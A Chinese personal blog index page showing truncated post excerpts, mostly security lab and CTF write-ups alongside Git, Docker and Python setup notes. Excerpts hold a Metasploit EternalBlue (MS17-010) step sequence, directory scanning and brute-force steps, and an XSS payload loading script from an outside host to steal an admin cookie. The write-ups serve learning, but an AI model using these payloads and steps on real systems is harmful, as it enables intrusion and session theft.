在自己的博客上部署即可短文
写了大半天,终于把即刻短文的效果弄好了。
花费三天时间终于把在线网页后台搭建出来了,芜湖~
可算是回家了,不过最近好多人阳,保护好自己!
最近非常的懒,博客都没怎么上过。
最近学校开启了订单班,听的有点一愣一愣的
Windows 11 上安装 Git 的步骤: 查看操作步骤 打开浏览器,前往 Git 官方网站:https://git-scm.com/downloads。在页面中选择 “Windows” 操作系统,并下载最新的安装程序。你可以根据你的系统架构选择 32 位或 64 位版本。下载完成后,双击运行安装程序。在弹出的安装窗口中点击“下一步”。阅读许可协议并同意,然后再次点击“下一步”。选择安装路径或保留默认设置,然后点击“下一步”。选择组件,建议选择默认选项,然后点击“下一步”。配置安装选项,建议选择默认设置,并确保勾选 “Enable Git Credential Manager” 和 “Use OpenSSL library” 选项,然后点击“下一步”。选择启动菜单文件夹,建议保留默认设置,然后点击“下一步”。选择额外任务,建议保留默认设置,然后点击“下一步”。点击“安装”按钮开始安装 Git。安装完成后,在“完成”窗口中,确保选中 “Launch Git Bash” 选项,然后点击“完成”。打开 Git Bash 终端,输 ...
以下是在Kali环境中安装Docker的详细步骤:1. 修改源打开终端,输入以下命令: 1sudo nano /etc/apt/sources.list 找到文件中的所有原始并将其替换为中科大的源,请将以下两行添加到文件的末尾: 12deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 按CTRL+X,然后按Y保存更改。 2. 安装Docker在终端中运行以下命令来安装Docker: 12sudo apt updatesudo apt install docker.io 3. 检查是否安装完成运行以下命令检查Docker是否正确安装: 1docker --version 如果一切正常,您应该看到Docker的版本信息。 4. Docker源加速为了加快Docker镜像的下载速度,我们可以使用一个国内镜像站点。创建文件/etc/docker/dae ...
使用dirsearch工具进行目录扫描使用dirsearch工具进行目录扫描,命令如下: 1python3 dirsearch.py -u http://10.2.4.56 -e php -t 50 其中,-u指定扫描的目标URL,-e指定扫描的文件类型,-t指定线程数。 扫描结果中可以看到一个/admin.php目录,访问该目录,发现是一个登录页面。 使用bp对登录页面进行弱密码爆破使用bp对登录页面进行弱密码爆破,具体命令可以根据bp的使用文档来执行。
步骤如下: 扫描目标网站 使用dirsearch-master工具对目标网站进行扫描,命令为: 1python3 dirsearch.py -u http://target.com -e php 其中,-u参数指定目标网站的URL,-e参数指定需要扫描的文件类型为php。 扫描结果如下图所示: 可以看到,扫描结果中有一个/admin/目录。 访问/admin/目录 访问http://target.com/admin/,可以看到一个登陆页面。 使用GitHack-master工具获取源代码 使用GitHack-master工具获取目标网站的源代码,命令为: 1python3 githack.py -u http://target.com/admin/ 其中,-u参数指定目标网站的URL。 获取到的源代码如下图所示: 可以看到,源代码中有一个config.php文件,里面存储了数据库的用户名和密码。 获取flag 使用config.php中的用户名和密码登陆/admin/目录,可以看到一个flag。 flag为:flag{e6b1c7a8d2b2a0ee0a29a1f7 ...
本文将介绍如何使用Metasploit框架攻击MS17-010漏洞,不过需要提醒的是,攻击行为是违法的,只能在授权的情况下进行。 步骤一:打开Kali Linux终端输入命令 msfconsole 启动Metasploit框架。 步骤二:查找漏洞模块输入命令 search ms17-010 查找漏洞模块。 步骤三:选择漏洞模块选择适合的漏洞模块,输入命令 use exploit/windows/smb/ms17_010_eternalblue,使用该漏洞模块。 步骤四:查看漏洞模块的选项输入命令 show options 查看该漏洞模块的选项。 步骤五:设置目标主机IP地址输入命令 set RHOSTS 192.168.0.1,将IP地址替换成实际的靶机IP地址。 步骤六:设置攻击者IP地址输入命令 set LHOST 192.168.0.2,将IP地址替换成实际的攻击者IP地址。 步骤七:设置目标主机操作系统输入命令 set target 2,将数字替换成目标主机的操作系统编号(例如:2表示Windows Server 2008 R2)。 步骤八:开始攻击输入命令 run,开始攻击。 ...
靶机介绍首先进入靶机,得到以下线索: 1234这该死的黑客为了拿到flag,把环境破环成这个鬼样子啦。这个黑客以root身份进入到了服务器拿到了flag奥对了,听说这个版本是禅知1.6哦提示:命令历史 通过这些线索,我们得知了黑客使用了root权限,并且该靶机是禅知1.6版本。但是我们还需要更多的信息来进行推理和查找。 禅知1.6介绍我们需要先了解一下禅知1.6是什么,它是一款企业级开源知识管理系统,提供集中式的知识管理平台,支持多语言、多平台,具有高度的可扩展性和灵活性,方便员工共享知识和信息,提高工作效率和协作效果。 禅知1.6的漏洞根据题目给出的线索,我们知道禅知1.6存在一个BUG,可以在前台任意文件读取。而file主要用于上传和管理文件,用户可以在任务、需求、Bug等模块中上传相关的文件,方便团队成员查看和下载。同时,管理员可以在文件管理模块中对上传的文件进行管理,包括删除、重命名、移动等操作。因此,我们可以在靶机地址上输入https:xxxxxx.com/file.php查看文件,但是发现file被删除了。 文件查找我们需要在禅知1.6的根目录下找到config.php文 ...
一、课堂作业(80分)作业一 DVWA CSRF Low 漏洞利用【20分】完成DVWA CSRF Low 漏洞利用,描述关键文字及截图证明过程及结果。 作业二 DVWA XSS(Reflected) Low 漏洞利用【10分】完成DVWA XSS(Reflected) Low 漏洞利用,描述关键文字及截图证明过程及结果。 作业三 DVWA XSS(Reflected) Medium漏洞利用【20分】完成DVWA XSS(Reflected) Medium漏洞利用,描述关键文字及截图证明过程及结果。 作业四 DVWA XSS(Stored) Low 漏洞利用【10分】完成DVWA XSS(Stored) Low 漏洞利用,描述关键文字及截图证明过程及结果。 作业五 DVWA XSS(Stored) Medium漏洞利用【20分】完成DVWA XSS(Stored) Medium漏洞利用,描述关键文字及截图证明过程及结果。 二、综合性作业(20分)在 https://cloud.dasctf.com/compete/524/detail 里进入当日作业,使用个人账号密码进行登录。账号为个 ...
注册XSS攻击平台首先,我们需要在 XSS8 这个平台进行账号注册。 创建XSS攻击项目完成注册后,我们可以创建一个项目,并选择超强默认模块,然后点击下一步。在这个页面,我们可以查看代码并复制以下代码: 1<sCRiPt sRC=//xss.yt/9Zgl></sCrIpT> 这个代码的作用是将特殊的代码植入到目标网站的数据库中。 发起XSS攻击接下来,我们需要在钓鱼网站上随便输入一个账号,并使用F12工具将密码框的最大长度改成很大。然后,将上述代码复制到密码栏内,并点击登录。等待一会儿,我们就能够获取到钓鱼网站的admin的cookie,例如: 1PHPSESSID=keaa336los93ss95fjuqqbori7 使用cookie登录到钓鱼网站后台为了使用这个cookie登录到钓鱼网站的后台,我们可以使用 EditThisCookie 插件。将cookie添加到插件内后,刷新页面,即可成功登录到钓鱼网站的后台。 注意事项这是一种比较简单的攻击方法,但是对于那些没有足够安全措施的网站来说,它依然是非常危险的。因此,我们需要时刻保持警惕,以免成为黑客的攻击 ...
安装phpstudy_pro首先需要安装phpstudy_pro,安装完成后启动该软件。 下载DVWA文件下载DVWA文件(https://github.com/digininja/DVWA),将文件放入phpstudy_pro\WWW\自己新建的文件夹\内。 配置DVWA在phpstudy_pro\WWW\自己新建的文件夹\dvwa\config中找到config.inc.php.dist复制一份,将文件名修改成config.inc.php。 打开config.inc.php,将关键词: 12$_DVWA[ 'db_user' ]$_DVWA[ 'db_password' ] 修改成: 12$_DVWA[ 'db_user' ] = 'root';$_DVWA[ 'db_password' ] = 'root'; 开启allow_url_include进入phpstudy_pro\Extensions\php\php7.3.4nts路径,打开php.in ...
步骤一:抓取靶机的包在输入过密码的前提下,使用Burp Suite抓取靶机的包,以便进行后续的密码爆破测试。 步骤二:找到正确的包后,发送给测试器进行密码爆破在找到正确的包后,将其发送给密码爆破测试器,进行后续的测试。 步骤三:在测试器中添加§前缀在测试器中,选取Authorization: Basic YWRtaW46MTIzNA==字段,并选中YWRtaW46MTIzNA==,然后点击右侧的添加§按钮,使其变成Authorization: Basic §YWRtaW46MTIzNA==§的格式。这样做是为了告诉程序需要对这个位置进行密码爆破测试,以便找到正确的密码。 步骤四:解码验证由于YWRtaW46MTIzNA==使用Basic进行解码后得到admin:1234,从而得知密码格式是user:password。 步骤五:在有效载荷中添加前缀admin:为了进行密码爆破,需要在有效载荷中添加前缀admin:,以便对密码进行猜测。 步骤六:对前缀admin:进行Base64编码处理在有效载荷处理中,选中前缀admin:,然后选择Base64编码处理,进行编码操作。 步骤七:取消特殊字 ...
操作步骤 查看源代码首先,需要查看目标网站的源代码,以便了解网站的结构和可能存在的漏洞。在本例中,我们发现了一个名为secret.php的文件。 使用Burp抓包使用Burp抓包,获取请求信息。在此过程中,我们可以了解到请求头、请求体等信息。 发送请求到重发器将请求信息发送到重发器中,以便对其进行修改和重放。 在请求头中添加Referer在Host下添加Referer字段,告诉服务器请求来源。在本例中,我们需要添加: 1Referer: https://Sycsecret.buuoj.cn 在User-Agent中添加浏览器信息服务器可能会根据User-Agent字段判断请求的来源。在本例中,我们需要使用Syclover浏览器,所以需要在User-Agent中添加浏览器信息。具体来说,我们需要在User-Agent字段的末尾添加Syclover。完整的User-Agent字段如下: 1Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0 ...
如何在同一台电脑上使用Python 2.7和Python 3.7在同一台电脑上使用Python 2.7和Python 3.7是很常见的需求。但是,在安装和配置Python环境时,需要注意一些问题,以确保两个版本的Python能够正常运行。 确认Python环境变量设置正确在设置Python环境变量时,应该将Python 2.7和Python 3.7的路径分别添加到环境变量中,并将Python 2.7\Scripts和Python 3.7\Scripts的路径分别添加到环境变量中,例如: 1C:\Python27;C:\Python27\Scripts;C:\Python37;C:\Python37\Scripts 这样可以保证在CMD中使用Python 2.7和Python 3.7时,能够正确地找到Python解释器和pip命令。 修改Python 3.7的可执行文件名为了方便在CMD中使用Python 3.7,可以将Python 3.7的可执行文件名修改为“python3.exe”,并将其添加到环境变量中。这样,在CMD中输入“python3”命令即可启动Python 3.7解释器 ...
公告
今日我等若冷眼旁观,他日祸临己身,则无人为我摇旗呐喊
最新文章
网站资讯
文章数目 :
17
已运行时间 :
本站总字数 :
9.4k
本站访客数 :
本站总访问量 :
最后更新时间 :